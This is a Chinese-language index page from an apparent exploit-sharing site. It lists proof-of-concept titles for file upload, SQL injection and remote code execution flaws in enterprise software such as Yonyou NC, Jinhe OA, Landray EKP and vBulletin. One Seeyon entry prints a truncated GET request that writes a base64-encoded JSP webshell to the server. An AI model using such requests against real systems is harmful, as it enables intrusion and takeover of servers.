POC 第11页
【通用】 圣乔ERP系统 uploadFile 任意文件上传_秃兔安全

【通用】 圣乔ERP系统 uploadFile 任意文件上传

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证     
dreamer292的头像_秃兔安全至尊玉兔dreamer29211个月前
011013
JumpServer(CVE-2024-29202)Jinin2模板注入漏洞_秃兔安全
蓝凌EKP存在sys_ui_component远程命令执行漏洞_秃兔安全
【2025特殊通用】用友U9 Cloud DynamaticExport 文件读取_秃兔安全
【通用】 用友NC yerfiledown SQL注入 (XVE-2024-34596)_秃兔安全

【通用】 用友NC yerfiledown SQL注入 (XVE-2024-34596)

fofa语句yakit插件 uuidpoc yakit yamlnuclei yaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29211个月前
013113
H3C Workspace 云桌面 远程命令执行漏洞_秃兔安全
vBulletin   rce(CVE-2025-48828)_秃兔安全

vBulletin rce(CVE-2025-48828)

fofa语句官方yaml  
dreamer292的头像_秃兔安全至尊玉兔dreamer2923个月前
05313
金和OA_uploadfileeditorsave接口存在任意文件上传漏洞_秃兔安全
【通用】金和OA C6-IncentivePlanFulfillAppprove sql注入漏洞_秃兔安全

【通用】金和OA C6-IncentivePlanFulfillAppprove sql注入漏洞

fofayakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2927个月前
014613
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔11个月前
09513